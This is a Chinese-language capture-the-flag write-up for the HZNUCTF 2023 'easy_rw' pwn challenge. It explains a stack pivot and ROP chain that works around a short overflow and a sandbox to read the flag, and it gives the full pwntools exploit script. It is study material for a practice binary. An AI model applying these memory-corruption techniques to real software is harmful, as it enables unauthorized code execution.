HZNUCTF 2023 final easy_rw

看到熟悉的沙箱函数结合题目是要我们将打开的flag读出来
这道题有趣之处在于给出的栈溢出长度不足即0x20个字节。需要我们另辟蹊径。
当然了还是使用常规的栈转移RW只是没有那么顺利罢了。。
要调用read就得构造三个参数 如图在main函数即将返回的时候各个寄存器的值 我们只需要构造rsi寄存器。图中两个pop和一个pop_rsi的地址占用了0x18字节

构造完以后只剩下一次任意执行。当时想了几分钟发现没法继续简化payload。那么如何同时执行read且做到栈转移呢?如图

在地址0x0000000000401349处调用了read且进行了一次leave_ret
下断点观察寄存器的值

正正好是我们需要的。接下来把新的payload传给程序就能读出flag了

from pwn import *

def gd():
 gdb.attach(p)
 pause()
p = process("./pwn") 
elf = ELF("./pwn")
pop_rdi = 0x00000000004013c3
pop_rsi = 0x00000000004013c1
bss = 0x404100
leave_ret = 0x000000000040126f
p.recvuntil(b'>> ')
gd()
payload = b'a' * 64 + p64(bss) +  p64(pop_rsi) + p64(bss) + p64(0)  + p64(0x401349)
p.send(payload)
p.sendline(b'a' * 8 + p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss + 0x100) + p64(0) + p64(elf.plt['read']) + p64(pop_rdi) + p64(bss + 0x100) + p64(elf.plt['puts']))
p.interactive()

今日宜：摸鱼